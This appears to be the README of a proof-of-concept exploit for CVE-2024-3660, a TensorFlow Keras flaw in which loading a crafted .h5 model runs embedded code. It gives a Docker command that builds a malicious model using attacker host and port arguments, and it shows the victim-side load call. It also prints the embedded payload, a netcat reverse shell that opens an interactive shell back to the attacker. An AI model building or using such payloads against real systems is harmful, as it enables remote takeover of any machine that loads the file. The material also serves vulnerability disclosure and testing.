# CVE-2024-3660 – TensorFlow Keras Arbitrary Code Execution via Malicious Model

## Overview
**CVE-2024-3660** is an arbitrary code execution vulnerability in TensorFlow's Keras framework affecting versions **< 2.13**.  
It allows an attacker to embed Python code inside a model (e.g., via a `Lambda` layer) which executes **automatically** when the model is loaded.

When a malicious `.h5` model file is loaded in a vulnerable environment, arbitrary commands are executed **with the same permissions as the loading process**.

---

## Affected Versions
- TensorFlow's Keras **< 2.13.0**
- Keras models loaded via:
  ```python
  tf.keras.models.load_model("CVE20243660.h5", compile=False)
or in older TensorFlow versions where safe_mode is not enabled by default.

## PoC Description

This PoC uses a Docker-based build to generate a malicious hack.h5 model containing a reverse shell payload.
When the model is loaded in a vulnerable TensorFlow version, it connects back to the attacker's machine.

# Usage
## 1. Build & Extract Malicious Model
```bash
docker buildx build \
  --platform linux/amd64 \
  --build-arg LHOST=<YOUR-IP> \
  --build-arg LPORT=<YOUR-PORT> \
  -t tfimg . && \
container_id=$(docker create tfimg) && \
docker cp $container_id:/CVE20243660/CVE20243660.h5 ./CVE20243660.h5 && \
docker rm $container_id
```
## 2. Load the Malicious Model (Victim Side)

- On a vulnerable TensorFlow environment (< 2.13):
```python
import tensorflow as tf
model = tf.keras.models.load_model("CVE20243660.h5", compile=False)
```
---
# Payload

- The embedded payload uses nc for a reverse shell:
``` bash
rm -f /tmp/f; mknod /tmp/f p; cat /tmp/f | /bin/sh -i 2>&1 | nc LHOST LPORT >/tmp/f
```
---
# References
[NVD](https://nvd.nist.gov/vuln/detail/CVE-2024-3660)
[CMU](https://www.kb.cert.org/vuls/id/253266)
[Oligo Secuirty](https://www.oligo.security/blog/tensorflow-keras-downgrade-attack-cve-2024-3660-bypass)
